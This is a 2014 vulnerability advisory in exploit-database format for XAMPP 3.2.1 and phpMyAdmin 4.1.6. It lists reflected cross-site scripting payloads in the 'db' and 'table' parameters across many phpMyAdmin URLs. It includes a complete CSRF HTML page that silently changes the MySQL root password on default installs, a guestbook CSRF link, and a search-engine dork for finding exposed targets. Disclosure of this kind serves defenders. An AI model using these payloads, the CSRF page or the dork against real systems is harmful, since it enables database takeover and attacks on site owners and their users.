#; XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities

1. Full title XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities (XSS & CSRF)
2. Date add 2014-04-08
3. Category web applications
4. Platform php
5. Risk <font color="#FFBF00">Security Risk High</font>
6. Description phpMyAdmin version 4.1.6 with XAMPP version 3.2.1 installed suffers from cross site request forgery and cross site scripting vulnerabilities.
7.  
8. =========================================================
9.  
10. # Title: XAMPP 3.2.1 & phpMyAdmin 4.1.6 <= multiple vulnerabilities
11. # Date: 6/04/2014
12. # Author:
13. # Software Link: http://www.apachefriends.org/en/xampp-windows.html
14. # Version: 3.2.1 & 4.1.6
15. # Tested on: Windows 7
16. # CVE : ()
17. [#]----------------------------------------------------------------[#]
18. #
19. # [x] XAMPP & phpMyAdmin <= 4.1.6 multiple vulnerabilites
20. # [x] Author : Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188), Gurjant Singh Sadhra(@GurjantSadhra)
21. # [x] Contact : mayank.kapoor1708@gmail.com, gurjant31@gmail.com, sujoy3188@gmail.com
22. # [+] Download : http://www.apachefriends.org/en/xampp-windows.html
23. #
24. [#]----------------------------------------------------------------[#]
25. #
26. # [x] Exploit :
27. #
28. [1] phpMyAdmin is vulnerable to a cross site scripting attack.
29. # The vulnerability exists within the phpMyAdmin module supplied by XAMPP.
30. #
31. # 1. Cross Site Scripting
32. #
33. # In the phpMyAdmin module of the XAMPP application the following urls are vulnerable to cross site scripting attacks. The "db" parameter can be passed with
34. # { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack. The file "c:\xampp\phpMyAdmin\libraries\db_table_exists.lib.php"
35. # checks if the "db" parameter is a valid database name or not (line 13-18).
36. #
37. if (empty($is_db)) {
38. if (strlen($db)) {
39. $is_db = @$GLOBALS['dbi']->selectDb($db);
40. } else {
41. $is_db = false;
42. }
43.  
44.  
45. # Vulnerable parameter: "db"
46. # http://[host]/phpmyadmin/chk_rel.php?db=>"'><img src="javascript:alert(311050)">&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php
47. #
48. # Multiple URL's afected:
49. http://[host]/phpmyadmin/db_printview.php
50. http://[host]/phpmyadmin/index.php
51. http://[host]/phpmyadmin/pmd_general.php
52. http://[host]/phpmyadmin/prefs_manage.php
53. http://[host]/phpmyadmin/server_collations.php
54. http://[host]/phpmyadmin/server_databases.php
55. http://[host]/phpmyadmin/server_engines.php
56. http://[host]/phpmyadmin/server_export.php
57. http://[host]/phpmyadmin/server_import.php
58. http://[host]/phpmyadmin/server_privileges.php
59. http://[host]/phpmyadmin/server_replication.php
60. http://[host]/phpmyadmin/server_sql.php
61. http://[host]/phpmyadmin/server_status.php
62. http://[host]/phpmyadmin/server_variables.php
63. http://[host]/phpmyadmin/sql.php
64. http://[host]/phpmyadmin/tbl_create.php
65.  
66. # Vulnerable parameter: "table"
67. #
68. # Similar to the above mentioned vulnerability, here the "table" parameter also can be submitted with { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack.
69. #
70. # Multiple URL's afected:
71.  
72. http://[host]/phpmyadmin/tbl_select.php?db=information_schema&token=6026d96cfcb8993f744a00809536dc8b&goto=db_structure.php&table=>"'><img src="javascript:alert(347790)">#PMAURL-0:tbl_select.php?db=information_schema&table=>"'><img+src="javascript:alert(347790)">&server=1&target=&lang=en&collation_connection=utf8mb4_general_ci&token=529d5dba2f3dd12daf48aa38596e1708
73.  
74. http://[host]/phpmyadmin/tbl_structure.php
75. #
76. #
77. # 2. Cross Site Request Forgery
78. # After installing XAMPP the default password for MySQL is blank with the default user being "root". In the link "http://localhost/security/xamppsecurity.php" there is an option to change
79. # the MySQL password for the user "root". The form that submits the new password is not authenticated with a token or any such XSRF protection. The below html page can be sent to the victim,
80.  
81. <html>
82. <script>
83. document.getElementById("xampp").submit();
84. </script>
85. <body onload="run_once()">
86. <form id="xampp" action="http://localhost/security/xamppsecurity.php" method="POST">
87. <input type="hidden" name="mypasswd" value="test@123" />
88. <input type="hidden" name="mypasswdrepeat" value="test@123" />
89. <input type="hidden" name="authphpmyadmin" value="cookie" />
90. <input type="hidden" name="changing" value="Password changing" />
91. <input type="hidden" name="xamppuser" value="" />
92. <input type="hidden" name="xampppasswd" value="" />
93. <input type="submit" value="Click here" />
94. </form>
95. </body>
96. </html>
97.  
98. # thus succesfully changing the password to "test@123". This will only work if the password has never been changed since installation.
99. #
100. #
101. # Another location in the XAMPP application vulnerable to Cross site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl .
102.  
103. http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam
104.  
105. dork: "inurl:xampp/guestbook-en.pl"
106.  
107. [#]----------------------------------------------------------------[#]
108.  
109. #EOF